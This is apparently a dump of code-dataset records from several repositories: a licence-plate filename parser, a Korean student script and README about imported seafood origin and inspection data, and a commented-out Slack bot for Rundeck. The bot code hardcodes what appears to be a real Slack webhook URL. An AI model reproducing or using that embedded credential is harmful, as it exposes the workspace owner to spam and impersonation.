"text": "# import cv2\n# import torch\n# img=cv2.imread('/home/zyx/Pictures/Autumn_in_Kanas_by_Wang_Jinyu.jpg')\n#\n# # cv2.rectangle(img,(100,200),(900,900),(0,255,0),2)\n# # cv2.imshow('test',img)\n# # cv2.waitKey(3000)\n# print(torch.__version__)\n# print(torch.cuda.is_available())\n# print('hello world')\nfor i in range(1,7):\n print(i)"
},
{
"alpha_fraction": 0.4254518151283264,
"alphanum_fraction": 0.4864457845687866,
"avg_line_length": 36.91428756713867,
"blob_id": "f87d23c4d80e6b49c83da881aafa226e1c6df950",
"content_id": "00be60713eea9f5984b9dee2963e283211e800f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1452,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 35,
"path": "/src/dataLoader/ccpdDataReader.py",
"repo_name": "zyx1001/plate_detection",
"src_encoding": "UTF-8",
"text": "# 车牌所需字符\nprovinces = [\"皖\", \"沪\", \"津\", \"渝\", \"冀\", \"晋\", \"蒙\", \"辽\", \"吉\", \"黑\", \"苏\", \"浙\", \"京\", \"闽\", \"赣\", \"鲁\", \"豫\", \"鄂\", \"湘\", \"粤\", \"桂\",\n \"琼\", \"川\", \"贵\", \"云\", \"藏\", \"陕\", \"甘\", \"青\", \"宁\", \"新\", \"警\", \"学\", \"O\"]\n\nads = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'J', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X',\n 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'O']\n\nclass ccpdDataReader(object):\n\n # 返回图片对应的车牌框位置\n @staticmethod\n def readCCPDtoRectangle(path):\n list=path.split('-')\n loc_rectangle=list[2]\n left_top=loc_rectangle.split('_')[0]\n right_bottom=loc_rectangle.split('_')[1]\n left=left_top.split('&')[0]\n top=left_top.split('&')[1]\n right=right_bottom.split('&')[0]\n bottom=right_bottom.split('&')[1]\n return left,right,bottom,top\n\n # 返回图片对应的车牌号码\n @staticmethod\n def readCCPDtoPlateNum(path):\n list = path.split('-')\n pln=[]\n pln_oringin=list[4]\n pln_oringin=pln_oringin.split('_')\n pln.append(provinces[int(pln_oringin[0])])\n for i in range(1,7):\n pln.append(ads[int(pln_oringin[i])])\n return pln\nexample='025-95_113-154&383_386&473-386&473_177&454_154&383_363&402-0_0_22_27_27_33_16-37-15.jpg'\nprint(ccpdDataReader.readCCPDtoPlateNum(example))\n\n"
}
] | 2 |
ayd0427/Final-HW
|
https://github.com/ayd0427/Final-HW
|
333be40d225d65d049196483df41dff3448cd50d
|
a1e06a439c8c7ca128aa77d5bb96d369d978943e
|
eb27093a53fe1e1cf1a0af06d9127c115a1b7857
|
refs/heads/master
| 2020-05-28T11:06:10.878549 | 2019-06-04T08:07:43 | 2019-06-04T08:07:43 | 188,979,152 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5394260287284851,
"alphanum_fraction": 0.5787127614021301,
"avg_line_length": 23.111888885498047,
"blob_id": "61146aa2f9214fa1dcb66312aae8516f7e6b09f3",
"content_id": "a12a66cb29156f17088ab56e8f8007e6a6b416a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4821,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 143,
"path": "/201529154_안용덕_기말과제.py",
"repo_name": "ayd0427/Final-HW",
"src_encoding": "UTF-8",
"text": "import pandas as pd\r\nimport sys #프로그램 종료를 위해 import\r\n\r\ndf = pd.read_csv('origin.csv') #수입 원산지 제공 공공데이터\r\n\r\n#1. 수입되는 수산물 품목의 종류를 제공(출력)\r\ndf1 = df.iloc[1773:,7] #origin.csv에서 종류 추출, 1773이 수입 처음\r\n#print(df1) #품목들 출력\r\n\r\nmatrix = [] # 상세한 품목 종류를 저장할 리스트\r\nfor indata in df1:\r\n indata = indata.replace(\"'\", \"\") # ' 을 공백으로 변환\r\n matrix.append(indata) #변환된 목록들을 리스트로 추가\r\n\r\nmatrix2 = [] # 간단한 품목 종류를 저장할 리스트\r\nfor indata1 in df1:\r\n indata1 = indata1.replace(\"'\", \"\") # ' 을 공백으로 변환\r\n indata1 = indata1.split(\"(\") # ( 를 기준으로 리스트형식으로 분리 후\r\n del(indata1[1:]) # 뒤에 내용 삭제\r\n indata1 = indata1.pop() #리스트 안에 리스트를 넣게되어서 그전에 값만 추출\r\n #print(indata1)\r\n matrix2.append(indata1)\r\n\r\nuser_num = input(\"품목종류(번호입력) : 1. 상세히 2. 간단히\")\r\n\r\nif user_num == '1' :\r\n print(matrix) #리스트화 된 상세한 목록들 출력\r\n print()\r\nelif user_num == '2':\r\n print(matrix2) #리스트화 된 간단한 목록들 출력\r\n print()\r\nelse :\r\n print(\"Error\")\r\n sys.exit()\r\n\r\n#1-1. 사용자가 선택한 수산물 품목의 원산지 제공(출력)을 위한 리스트 정리\r\ndf2 = df.iloc[1773:,5] #origin.csv에서 원산지 추출\r\n\r\nmatrix3 = [] # 품목별 원산지를 저장할 리스트\r\nfor indata2 in df2:\r\n indata2 = indata2.replace(\"'\",\"\")\r\n #print(indata2)\r\n matrix3.append(indata2)\r\n#print(matrix3)\r\n\r\n#2. 사용자가 다양한 품목 중 하나를 입력.\r\nuser = input(\"품목입력 : \")\r\n\r\n#3. 입력받은 품목이 matrix2 리스트 안에 있으면 원산지 및 품질인증여부 출력\r\nif user in matrix2:\r\n print(user + \"의 원산지는 아래와 같습니다.\")\r\nelse:\r\n print()\r\n\r\nk = 0 # 리스트 matrix2 에서 품목별 위치를 저장하기 위해 만든 변수\r\nfor i in matrix2:\r\n if i == user:\r\n #print(k)\r\n if user in matrix2:\r\n print(matrix3[k]) # matrix3에서 k번째의 품목의 원산지 출력\r\n k = k + 1\r\n\r\n if user not in matrix2:\r\n print(\"해당 품목 없음.\")\r\n print(\"안녕히가세요\")\r\n sys.exit()\r\n break\r\nprint()\r\n\r\n# 품질인증여부 확인\r\ndd = pd.read_csv('inspection.csv')\r\n\r\ndd1 = dd.iloc[:,4] #품목\r\ndd2 = dd.iloc[:,7] #총수입건수\r\ndd3 = dd.iloc[:,10] #품질인증 부적합건수\r\n\r\nlist1 = [] #품목 종류를 저장할 리스트\r\nfor indata in dd1:\r\n indata = indata.replace(\"냉동\", \"\") #원활한 품목검색을 위하여 공통 글 공백화\r\n indata = indata.replace(\"냉장\", \"\")\r\n indata = indata.replace(\"활\", \"\")\r\n list1.append(indata)\r\n\r\nlist2 = [] #총수입건수 저장 리스트\r\nfor indata in dd2:\r\n list2.append(indata)\r\n\r\nlist3 = [] #부적합건수 저장 리스트\r\nfor indata in dd3:\r\n list3.append(indata)\r\n\r\ndict1 = dict(zip(list1, list2)) #딕셔너리화\r\ndict2 = dict(zip(list1, list3))\r\n\r\nif user in list1 :\r\n print(\"총 수입건수\" + str(dict1[user]))\r\n\r\n if dict2[user] != 0:\r\n print(\"품질인증 부적합건수\" + str(dict2[user]))\r\n print()\r\n else:\r\n print(\"품질인증 부적합건수 : 0\")\r\n print()\r\n\r\n#4. user가 원하면 관심있는 품목을 취급하는 위판장의 정보 제공\r\nuser_want = input(\"위판장의 정보를 제공받으시겠습니까? 
(Y or N)\").upper()\r\ndfff = pd.read_csv('sale.csv') #수입 수산물 위판장 정보 제공 공공데이터\r\n\r\ndfff1 = dfff.iloc[160:, 1] #위판장 정보 데이터에서 품목 종류, 160까지 같은 데이터라 시작점 160으로 설정.\r\n#print(dfff1)\r\ndfff2 = dfff.iloc[160:, 5] #위판장 정보 데이터에서 위판장 이름\r\n#print(dfff2)\r\n\r\nmatrix4 = [] # 품목 이름을 저장할 리스트\r\nfor indata3 in dfff1:\r\n indata3 = indata3.replace(\"'\",\"\")\r\n matrix4.append(indata3)\r\n#print(matrix4)\r\n\r\ndfff3 = dfff1 + dfff2 #품목 이름과 위판장 df를 합치기\r\n#print(dfff3)\r\nmatrix5 = [] # 품목 이름과 위판장을 저장할 리스트\r\nfor indata4 in dfff3:\r\n indata4 = indata4.replace(\"''\",\":\")\r\n indata4 = indata4.replace(\"'\",\"\")\r\n #print(indata4)\r\n matrix5.append(indata4)\r\n#print(matrix5)\r\nset_matrix5 = list(set(matrix5)) #중복되는 품목별 위판장을 제거\r\n#print(set_matrix5)\r\n\r\nif user_want == 'Y':\r\n print(\"-----위판장 정보-----\")\r\n if user in matrix4:\r\n for product in set_matrix5:\r\n product1 = product.split(\":\")\r\n if product1[0] == user:\r\n print(product1[1])\r\n else:\r\n print(\"위판정보없음.\")\r\n\r\nelse:\r\n print(\"안녕히가세요.\")"
},
{
"alpha_fraction": 0.5450182557106018,
"alphanum_fraction": 0.5911791324615479,
"avg_line_length": 23.59064292907715,
"blob_id": "1dbdf7f9b900cfb83d75d503accd8988009f4075",
"content_id": "7cced7510ba8d4f3392ec0d9b43ba2aaa50bc89c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6104,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 171,
"path": "/README.md",
"repo_name": "ayd0427/Final-HW",
"src_encoding": "UTF-8",
"text": "# 수입 수산물 품질인증 및 정보제공\r\n\r\n학과 | 학번 | 성명\r\n---- | ---- | ---- \r\n조선해양공학과 |201529154 |안용덕\r\n\r\n## 프로젝트 개발 동기\r\n후쿠시마 수산물 수입규제 문제로 WTO에서 승소판정을 받은 사례에서 국민들도 수입 수산물의 안정성을 알 필요가 있다고 생각하여 진행하게 되었음.\r\n\r\n\r\n## 프로젝트 개요\r\n1. 우리나라로 수입되는 수산물 품목의 종류를 제공(출력) - 여기서 사용자가 상세한 품목을 볼지 간단히 나타낸 품목을 볼지 선택할 수 있음.\r\n2. 사용자가 다양한 품목 중 하나를 입력.\r\n3. 입력된 품목의 원산지와 품질인증 여부를 출력.\r\n4. 사용자가 원하면 수산물 위판장의 목록을 나열.\r\n\r\n## 사용한 공공데이터 \r\n1.[데이터보기1](https://github.com/ayd0427/Final-HW/blob/master/inspection.csv)\r\n2.[데이터보기2](https://github.com/ayd0427/Final-HW/blob/master/origin.csv)\r\n3.[데이터보기3](https://github.com/ayd0427/Final-HW/blob/master/sale.zip)\r\n\r\n## 소스\r\n* [링크로 소스 내용 보기](https://github.com/ayd0427/Final-HW/blob/master/201529154_%EC%95%88%EC%9A%A9%EB%8D%95_%EA%B8%B0%EB%A7%90%EA%B3%BC%EC%A0%9C.py) \r\n\r\n* 코드 삽입\r\n~~~python\r\nimport pandas as pd\r\nimport sys #프로그램 종료를 위해 import\r\n\r\ndf = pd.read_csv('origin.csv') #수입 원산지 제공 공공데이터\r\n\r\n#1. 수입되는 수산물 품목의 종류를 제공(출력)\r\ndf1 = df.iloc[1773:,7] #origin.csv에서 종류 추출, 1773이 수입 처음\r\n#print(df1) #품목들 출력\r\n\r\nmatrix = [] # 상세한 품목 종류를 저장할 리스트\r\nfor indata in df1:\r\n indata = indata.replace(\"'\", \"\") # ' 을 공백으로 변환\r\n matrix.append(indata) #변환된 목록들을 리스트로 추가\r\n\r\nmatrix2 = [] # 간단한 품목 종류를 저장할 리스트\r\nfor indata1 in df1:\r\n indata1 = indata1.replace(\"'\", \"\") # ' 을 공백으로 변환\r\n indata1 = indata1.split(\"(\") # ( 를 기준으로 리스트형식으로 분리 후\r\n del(indata1[1:]) # 뒤에 내용 삭제\r\n indata1 = indata1.pop() #리스트 안에 리스트를 넣게되어서 그전에 값만 추출\r\n #print(indata1)\r\n matrix2.append(indata1)\r\n\r\nuser_num = input(\"품목종류(번호입력) : 1. 상세히 2. 간단히\")\r\n\r\nif user_num == '1' :\r\n print(matrix) #리스트화 된 상세한 목록들 출력\r\n print()\r\nelif user_num == '2':\r\n print(matrix2) #리스트화 된 간단한 목록들 출력\r\n print()\r\nelse :\r\n print(\"Error\")\r\n sys.exit()\r\n\r\n#1-1. 사용자가 선택한 수산물 품목의 원산지 제공(출력)을 위한 리스트 정리\r\ndf2 = df.iloc[1773:,5] #origin.csv에서 원산지 추출\r\n\r\nmatrix3 = [] # 품목별 원산지를 저장할 리스트\r\nfor indata2 in df2:\r\n indata2 = indata2.replace(\"'\",\"\")\r\n #print(indata2)\r\n matrix3.append(indata2)\r\n#print(matrix3)\r\n\r\n#2. 사용자가 다양한 품목 중 하나를 입력.\r\nuser = input(\"품목입력 : \")\r\n\r\n#3. 입력받은 품목이 matrix2 리스트 안에 있으면 원산지 및 품질인증여부 출력\r\nif user in matrix2:\r\n print(user + \"의 원산지는 아래와 같습니다.\")\r\nelse:\r\n print()\r\n\r\nk = 0 # 리스트 matrix2 에서 품목별 위치를 저장하기 위해 만든 변수\r\nfor i in matrix2:\r\n if i == user:\r\n #print(k)\r\n if user in matrix2:\r\n print(matrix3[k]) # matrix3에서 k번째의 품목의 원산지 출력\r\n k = k + 1\r\n\r\n if user not in matrix2:\r\n print(\"해당 품목 없음.\")\r\n print(\"안녕히가세요\")\r\n sys.exit()\r\n break\r\nprint()\r\n\r\n# 품질인증여부 확인\r\ndd = pd.read_csv('inspection.csv')\r\n\r\ndd1 = dd.iloc[:,4] #품목\r\ndd2 = dd.iloc[:,7] #총수입건수\r\ndd3 = dd.iloc[:,10] #품질인증 부적합건수\r\n\r\nlist1 = [] #품목 종류를 저장할 리스트\r\nfor indata in dd1:\r\n indata = indata.replace(\"냉동\", \"\") #원활한 품목검색을 위하여 공통 글 공백화\r\n indata = indata.replace(\"냉장\", \"\")\r\n indata = indata.replace(\"활\", \"\")\r\n list1.append(indata)\r\n\r\nlist2 = [] #총수입건수 저장 리스트\r\nfor indata in dd2:\r\n list2.append(indata)\r\n\r\nlist3 = [] #부적합건수 저장 리스트\r\nfor indata in dd3:\r\n list3.append(indata)\r\n\r\ndict1 = dict(zip(list1, list2)) #딕셔너리화\r\ndict2 = dict(zip(list1, list3))\r\n\r\nif user in list1 :\r\n print(\"총 수입건수\" + str(dict1[user]))\r\n\r\n if dict2[user] != 0:\r\n print(\"품질인증 부적합건수\" + str(dict2[user]))\r\n print()\r\n else:\r\n print(\"품질인증 부적합건수 : 0\")\r\n print()\r\n\r\n#4. user가 원하면 관심있는 품목을 취급하는 위판장의 정보 제공\r\nuser_want = input(\"위판장의 정보를 제공받으시겠습니까? 
(Y or N)\").upper()\r\ndfff = pd.read_csv('sale.csv') #수입 수산물 위판장 정보 제공 공공데이터\r\n\r\ndfff1 = dfff.iloc[160:, 1] #위판장 정보 데이터에서 품목 종류, 160까지 같은 데이터라 시작점 160으로 설정.\r\n#print(dfff1)\r\ndfff2 = dfff.iloc[160:, 5] #위판장 정보 데이터에서 위판장 이름\r\n#print(dfff2)\r\n\r\nmatrix4 = [] # 품목 이름을 저장할 리스트\r\nfor indata3 in dfff1:\r\n indata3 = indata3.replace(\"'\",\"\")\r\n matrix4.append(indata3)\r\n#print(matrix4)\r\n\r\ndfff3 = dfff1 + dfff2 #품목 이름과 위판장 df를 합치기\r\n#print(dfff3)\r\nmatrix5 = [] # 품목 이름과 위판장을 저장할 리스트\r\nfor indata4 in dfff3:\r\n indata4 = indata4.replace(\"''\",\":\")\r\n indata4 = indata4.replace(\"'\",\"\")\r\n #print(indata4)\r\n matrix5.append(indata4)\r\n#print(matrix5)\r\nset_matrix5 = list(set(matrix5)) #중복되는 품목별 위판장을 제거\r\n#print(set_matrix5)\r\n\r\nif user_want == 'Y':\r\n print(\"-----위판장 정보-----\")\r\n if user in matrix4:\r\n for product in set_matrix5:\r\n product1 = product.split(\":\")\r\n if product1[0] == user:\r\n print(product1[1])\r\n else:\r\n print(\"위판정보없음.\")\r\n\r\nelse:\r\n print(\"안녕히가세요.\")\r\n\r\n~~~\r\n"
}
] | 2 |
Elygian/slackdeckbot
|
https://github.com/Elygian/slackdeckbot
|
43518ca4364540f1fe37a8355d8650e12d6a0908
|
1f0ef35ae454cfff52493c0e3d0d33460548cb6c
|
c2e80f753c8bfe86e33b00b9bb357804ae8a2ff6
|
refs/heads/master
| 2019-06-16T17:38:33.505738 | 2017-08-21T12:01:22 | 2017-08-21T12:01:22 | 99,248,619 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5454545617103577,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 17.33333396911621,
"blob_id": "dd322cd6125752db059039b94eab57fc3a842d8c",
"content_id": "d5e65278f7239cffcdfa1e368fc3afcd07d2fa81",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 55,
"license_type": "permissive",
"max_line_length": 18,
"num_lines": 3,
"path": "/requirements.txt",
"repo_name": "Elygian/slackdeckbot",
"src_encoding": "UTF-8",
"text": "slackclient==1.0.6\nrequests==2.18.3\nTimeConvert==1.4.1\n"
},
{
"alpha_fraction": 0.4704505503177643,
"alphanum_fraction": 0.47965317964553833,
"avg_line_length": 43.442081451416016,
"blob_id": "c513d513d9988e1bb4aa84b5142a2b6f42a65b7b",
"content_id": "46480715f47c861c5039592cb3ac348179076c87",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18799,
"license_type": "permissive",
"max_line_length": 630,
"num_lines": 423,
"path": "/mainTesting.py",
"repo_name": "Elygian/slackdeckbot",
"src_encoding": "UTF-8",
"text": "# from slackclient import SlackClient\n# from rundeck.client import Rundeck\n# from xml.dom import minidom, Node\n# from TimeConvert import TimeConvert as tc\n# from datetime import datetime\n# import time\n# import requests\n# import os\n# import sys\n# import json\n# import xml.etree.ElementTree as ET\n# import re\n#\n# try:\n# # You need to create 2 environment variables called SLACKBOT_MESSAGEBOT_TOKEN RUNDECK_API_TOKEN and with the correct values, which can be found on the teams slack channel settings\n# token = os.environ.get('SLACKBOT_MESSAGEBOT_TOKEN')\n# apitoken = os.environ.get('RUNDECK_API_TOKEN')\n#\n# #Instantiate the slack api object\n# slack_client = SlackClient(token)\n#\n# #Instantiate the rundeck api object\n# rd = Rundeck('rundeck.bsigroup.com',\n# api_token=apitoken, protocol='https', port='4443')\n#\n# #This is the link to the \"that would be great\" piture. Can be removed if you want, make sure to remove the relevant statement in the commands section!\n# link = '<https://cdn.meme.am/instances/400x/33568413.jpg|That would be great>'\n#\n# #Connect to the real time messaging API\n# slack_client.rtm_connect()\n#\n# resources = rd.list_project_resources('IPP')\n#\n# while True:\n#\n# def list_jobs():\n# jobs = rd.list_jobs('IPP')\n#\n# for job in jobs:\n# del job['project']\n# #del job['id']\n# del job['href']\n# del job['permalink']\n# del job['group']\n# del job['description']\n#\n# webhook_url = 'https://hooks.slack.com/services/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'\n# attachments = []\n# payload = {}\n#\n# for job in jobs:\n# attachment = {}\n# if isinstance(job, dict):\n# attachment[\"title\"] = job[\"name\"]\n# attachment[\"fallback\"] = \"\"\n# attachments.append(attachment)\n#\n# payload[\"text\"] = \"Rundeck Job List\"\n# payload[\"attachments\"] = attachments\n#\n# response = requests.post(webhook_url, data=json.dumps(\n# payload), headers={'Content-Type': 'application/json'})\n# if response.status_code != 200:\n# raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n# response.status_code, response.text))\n#\n# def list_nodes():\n# #Create a variable with a list of the jobs on the rundeck project\n# jobs = rd.list_jobs('IPP')\n#\n# #Create a variable with a list of nodes available to the IPP rundeck project\n# resources = rd.list_project_resources('IPP')\n#\n# nodes = []\n# for key in resources.keys():\n# nodes.append(key)\n#\n# webhook_url = 'https://hooks.slack.com/services/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'\n# attachments = []\n# payload = {}\n#\n# for node in nodes:\n# attachment = {}\n# attachment[\"title\"] = str(node)\n# attachment[\"fallback\"] = \"\"\n# attachment[\"color\"] = \"#27651a\"\n# attachments.append(attachment)\n#\n# payload[\"text\"] = \"Available Nodes on Rundeck\"\n# payload[\"attachments\"] = attachments\n#\n# response = requests.post(webhook_url, data=json.dumps(\n# payload), headers={'Content-Type': 'application/json'})\n# if response.status_code != 200:\n# raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n# response.status_code, response.text))\n#\n# def job_output():\n# job_output = vars(rd.api.execution(text[11:]))\n#\n# job_xml_file = open(\"jobXML.xml\", \"w\")\n# job_xml_file.write(str(job_output[\"body\"]))\n# job_xml_file.close()\n#\n# jobOutputXML = minidom.parse('jobXML.xml')\n#\n# job_name = jobOutputXML.getElementsByTagName('name')\n# job_description_list = jobOutputXML.getElementsByTagName('description')\n#\n# if 
job_description_list.length <= 2:\n# job_desc = \"No Description\"\n# elif job_description_list.length > 2:\n# job_desc = job_description_list[0].firstChild.nodeValue\n#\n# time_started_var = jobOutputXML.getElementsByTagName('date-started')\n# time_finished_var = jobOutputXML.getElementsByTagName('date-ended')\n# job_start_time = time_started_var[0].firstChild.nodeValue\n# job_end_time = time_finished_var[0].firstChild.nodeValue\n#\n# for ch in ['T', 'Z']:\n# if ch in job_start_time:\n# job_start_time = job_start_time.replace(ch, ' ')\n#\n# for ch in ['T', 'Z']:\n# if ch in job_end_time:\n# job_end_time = job_end_time.replace(ch, ' ')\n#\n# payload = {}\n#\n# attachments = [{\"color\": \"#0043c4\", \"title\": job_name[0].firstChild.nodeValue, \"text\": job_desc}, {\n# \"color\": \"#0043c4\", \"title\": \"Started: \" + job_start_time, \"text\": \"Finished: \" + job_end_time}]\n#\n# failed_nodes_obj = jobOutputXML.getElementsByTagName(\"failedNodes\")\n#\n# payload[\"attachments\"] = attachments\n#\n# webhook_url = 'https://hooks.slack.com/services/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'\n# response = requests.post(webhook_url, data=json.dumps(\n# payload), headers={'Content-Type': 'application/json'})\n# if response.status_code != 200:\n# raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n# response.status_code, response.text))\n# os.remove(\"jobXML.xml\")\n#\n# def rundeckstatus():\n# system_information = vars(rd.api.system_info())\n# sysinfo_xml_file = open(\"sysinfoXML.xml\", \"w\")\n# sysinfo_xml_file.write(str(system_information[\"body\"]))\n# sysinfo_xml_file.close()\n# systemInfoXML = minidom.parse('sysinfoXML.xml')\n# rundeck_version_info = systemInfoXML.getElementsByTagName('message')\n# ETXML = ET.parse('sysinfoXML.xml')\n# for value in ETXML.getiterator(tag='uptime'):\n# uptime = value.attrib['duration']\n# hours = int(int(uptime) / (60 * 60 * 1000))\n# for value in ETXML.getiterator(tag='loadAverage'):\n# cpu_usage_element = ET.tostring(value).decode('utf-8')\n# cpu_usage = re.findall('\\d+\\.\\d+', cpu_usage_element)\n#\n# slack_client.api_call(\n# 'chat.postMessage',\n# channel=channel,\n# text=\"Rundeck Info :nerd_face: :\" + \"`\" + str(rundeck_version_info[0].firstChild.nodeValue)[16:] + \"`\\n\" + \"Uptime :alarm_clock: : \" + \"`\" + str(\n# hours) + \" hours`\\n\" + \"CPU Usage :desktop_computer: : \" + \"`\" + str(cpu_usage[0]) + \"%\" + \"`\\n\",\n# as_user='true:'\n# )\n# os.remove('sysinfoXML.xml')\n#\n# def executions():\n# webhook_url = 'https://hooks.slack.com/services/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'\n# attachments = []\n# payload = {}\n# execution_output = vars(rd.api.executions('IPP'))\n# executionInfoXML = open(\"executionInfoXML.xml\", \"w\")\n# executionInfoXML.write(str(execution_output[\"body\"]))\n# executionInfoXML.close()\n# executionsXML = ET.parse('executionInfoXML.xml')\n# for value in executionsXML.getiterator(tag='execution'):\n# attachment = {}\n# if isinstance(value.attrib, dict):\n# attachment[\"title\"] = value.attrib[\"id\"]\n# attachment[\"title_link\"] = value.attrib[\"href\"]\n# attachment[\"text\"] = value.attrib[\"status\"]\n# attachment[\"fallback\"] = \"\"\n# if value.attrib[\"status\"] == \"succeeded\":\n# attachment[\"color\"] = \"#0dff00\"\n# else:\n# attachment[\"color\"] = \"#ff0000\"\n# attachments.append(attachment)\n# payload[\"text\"] = \"Todays rundeck jobs so far :clipboard:\"\n# payload[\"attachments\"] = attachments\n# response = requests.post(webhook_url, 
data=json.dumps(\n# payload), headers={'Content-Type': 'application/json'})\n# if response.status_code != 200:\n# raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n# response.status_code, response.text))\n# os.remove('executionInfoXML.xml')\n#\n# def runjobrdp():\n# slack_client.api_call(\n# 'chat.postMessage',\n# channel=channel,\n# text=\"Running Get RDP Sessions job, this could take up to 2 minutes, please wait until the results message comes back before using any other commands\",\n# as_user='true:'\n# )\n#\n# time.sleep(0.5)\n# job_object = rd.run_job('488abbce-d06c-4111-a2d3-3d8ae0a393d4',\n# argString={'from': 'Rundeck Slack Bot'}, timeout=120)\n#\n# time.sleep(0.5)\n# job_results = rd.get_execution_output(job_object[\"id\"])\n#\n# message_colour = \"#00ff39\"\n# if job_object[\"status\"] != \"succeeded\":\n# message_colour = \"#ff0000\"\n# elif job_object[\"status\"] == \"running\":\n# message_colour = \"#ffbf00\"\n#\n# payload = {\n# \"attachments\": [\n# {\n# \"color\": \"%s\" % message_colour,\n# \"title\": \"RDP Rundeck Job Page\",\n# \"text\": \"Link to the page for the job that was run\",\n# \"title_link\": \"%s\" % job_object[\"job\"][\"permalink\"]\n# },\n# {\n# \"color\": \"%s\" % message_colour,\n# \"title\": \"RDP Rundeck Job Results Page\",\n# \"text\": \"Permalink to the results of this specific job execution\",\n# \"title_link\": \"%s\" % job_object[\"href\"]\n# }\n# ]\n# }\n#\n# webhook_url = 'https://hooks.slack.com/services/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'\n# response = requests.post(webhook_url, data=json.dumps(\n# payload), headers={'Content-Type': 'application/json'})\n# if response.status_code != 200:\n# raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n# response.status_code, response.text))\n#\n# time.sleep(0.5)\n# job_results = rd.get_execution_output(job_object[\"id\"])\n#\n# slack_client.api_call(\n# 'chat.postMessage',\n# channel=channel,\n# text=\"Users with active RDP sessions are:\",\n# as_user='true:'\n# )\n#\n# rdp_users_text = \"\"\n#\n# for result in job_results[\"entries\"]:\n# if isinstance(result, dict):\n# if \"|\" in result[\"log\"]:\n# rdp_users_text += result[\"log\"].split(\"|\", 1)[1] + \",\"\n#\n# slack_client.api_call(\n# 'chat.postMessage',\n# channel=channel,\n# text=rdp_users_text,\n# as_user='true:'\n# )\n#\n# def runjobsiteversions(resources):\n#\n# nodes = []\n# for key in resources.keys():\n# nodes.append(key)\n#\n# if text[21:] not in nodes:\n# slack_client.api_call(\n# 'chat.postMessage',\n# channel=channel,\n# text=\"That server doesn't exist :face_with_rolling_eyes: Did you make a typo?\",\n# as_user='true:'\n# )\n# else:\n#\n# slack_client.api_call(\n# 'chat.postMessage',\n# channel=channel,\n# text=\"Running Get Site Versions job, please wait until the results message comes back before using any other commands\",\n# as_user='true:'\n# )\n#\n# time.sleep(0.5)\n# job_object = rd.run_job('242f3848-20fa-4ff9-8014-9acb45a6a7c5',\n# argString={'from': 'Rundeck Slack Bot'}, timeout=120, name=text[21:])\n#\n# message_colour = \"#00ff39\"\n# if job_object[\"status\"] != \"succeeded\":\n# message_colour = \"#ff0000\"\n# elif job_object[\"status\"] == \"running\":\n# message_colour = \"#ffbf00\"\n#\n# payload = {\n# \"attachments\": [\n# {\n# \"color\": \"%s\" % message_colour,\n# \"title\": \"Site Versions Rundeck Job Page\",\n# \"text\": \"Link to the page for the job that was run\",\n# \"title_link\": \"%s\" % job_object[\"job\"][\"permalink\"]\n# 
},\n# {\n# \"color\": \"%s\" % message_colour,\n# \"title\": \"Site Versions Rundeck Job Results Page\",\n# \"text\": \"Permalink to the results of this specific job execution\",\n# \"title_link\": \"%s\" % job_object[\"href\"]\n# }\n# ]\n# }\n#\n# webhook_url = 'https://hooks.slack.com/services/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'\n# response = requests.post(webhook_url, data=json.dumps(\n# payload), headers={'Content-Type': 'application/json'})\n# if response.status_code != 200:\n# raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n# response.status_code, response.text))\n#\n# time.sleep(0.5)\n# slack_client.api_call(\n# 'chat.postMessage',\n# channel=channel,\n# text=\"Getting site versions. Give me a minute :thinking_face:\",\n# as_user='true:'\n# )\n#\n#\n# version_list_data = rd.get_execution_output(job_object[\"id\"])\n#\n# site_version_list = version_list_data[\"entries\"]\n#\n# log_key_list = []\n# final_list = {}\n# for result in site_version_list:\n# log_key_list.append(result[\"log\"])\n#\n# payload = {}\n# attachments = []\n# for site_result in log_key_list:\n# r = []\n# x = re.split(\"\\s*([d|D]:\\\\\\\\.*)\", site_result)\n# if len(x) >= 3:\n# del x[1]\n# del x[1]\n# y = x[0].split()\n# if len(y) == 2:\n# site_name = y[0]\n# site_version = y[1]\n# final_list[str(site_name)] = str(site_version)\n# if \"host\" in site_name:\n# host_name = site_version\n# if \"env\" in site_name:\n# env_name = site_version\n# if \"host\" not in site_name or \"env\" not in site_name:\n# attachment = {}\n# attachment[\"color\"] = \"#ff0073\"\n# attachment[\"title\"] = site_name\n# attachment[\"text\"] = site_version\n# attachments.append(attachment)\n#\n# payload[\"text\"] = \"Site Versions: [{}] on [{}]\".format(env_name, host_name)\n# payload[\"attachments\"] = attachments\n#\n#\n# response = requests.post(webhook_url, data=json.dumps(payload), headers={'Content-Type': 'application/json'})\n# if response.status_code != 200:\n# raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (response.status_code, response.text))\n#\n# events = slack_client.rtm_read()\n# for event in events:\n# if (\n# 'channel' in event and\n# 'text' in event and\n# event.get('type') == 'message'\n# ):\n# channel = event['channel']\n# text = event['text']\n#\n# if text == \"!help\":\n# slack_client.api_call(\n# 'chat.postMessage',\n# channel=channel,\n# text=\"\"\"slackdeckBot Command List:\\n`!listjobs` - This shows a list of jobs currently in the IPP Rundeck project.\\n`!runjob:rdp` - This will run the 'Show RDP Sessions' Rundeck job and return links to the results page.\\n`!executions` - This is a WIP, it will generate an XML file with information about recently executed jobs and save it to the bot's working directory.\\n`!joboutput:[execution_id_number]` - This takes an execution job number and returns the name 